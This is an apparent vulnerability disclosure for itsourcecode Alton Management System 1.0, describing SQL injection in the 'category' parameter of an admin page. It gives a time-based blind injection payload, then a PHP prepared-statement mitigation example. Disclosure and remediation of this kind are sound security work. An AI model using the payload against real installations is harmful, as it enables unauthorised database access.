CVE8-3.md

Vendor

itsourcecode

Product

Alton Management System

Version

1.0

Download Source Code: https://itsourcecode.com/wp-content/uploads/2020/02/altonsystem.zip

Description

Log in as an administrator user, access the "/admin/category_save.php" page, and pass in the "category" parameter. Because of lax filtering, this parameter is vulnerable to SQL injection.

PoC

Parameter: category (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=1' AND (SELECT 4315 FROM (SELECT(SLEEP(5)))UBMb) AND 'gUvK'='gUvK
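
Mitigation for the "category" parameter described above, as an added example; it is not code from the Alton Management System or from the original report. The table and column names, the helper function names and the in-memory SQLite database (used so the script runs offline) are assumptions; the application itself runs on MySQL.

```php
<?php
// Added example: hardened handling of a "category" value.
// Assumptions: table `category`, column `category_name`, helper names,
// and SQLite in memory as an offline stand-in for the MySQL backend.
declare(strict_types=1);

function validate_category(string $raw): ?string
{
    $name = trim($raw);
    // Allow-list: letters, digits, space and a few separators, 1-64 characters.
    if (!preg_match('/^[\p{L}\p{N} _.&\'-]{1,64}$/u', $name)) {
        return null;
    }
    return $name;
}

function save_category(PDO $db, string $raw): bool
{
    $name = validate_category($raw);
    if ($name === null) {
        return false; // reject outright rather than trying to "clean" the input
    }
    // The value is bound as a parameter and never becomes part of the SQL text,
    // so quote characters that pass validation are stored as plain data.
    $stmt = $db->prepare('INSERT INTO category (category_name) VALUES (:name)');
    return $stmt->execute([':name' => $name]);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE category (id INTEGER PRIMARY KEY, category_name TEXT NOT NULL)');

// Constructed inputs: a plain name, a name with an apostrophe,
// and a value that mixes quotes with SQL operators.
$inputs = ['Beverages', "Kids' Toys", "1' AND 'a'='a"];
foreach ($inputs as $input) {
    $result = save_category($db, $input) ? 'saved' : 'rejected';
    printf("%-16s => %s\n", $input, $result);
}

// Read back what was stored; the apostrophe is kept as literal text.
foreach ($db->query('SELECT category_name FROM category') as $row) {
    echo 'stored: ', $row['category_name'], "\n";
}
```

With a MySQL backend the same pattern applies through a `mysql:` PDO DSN or mysqli prepared statements; the allow-list is a second layer, and the bound parameter is what removes the injection.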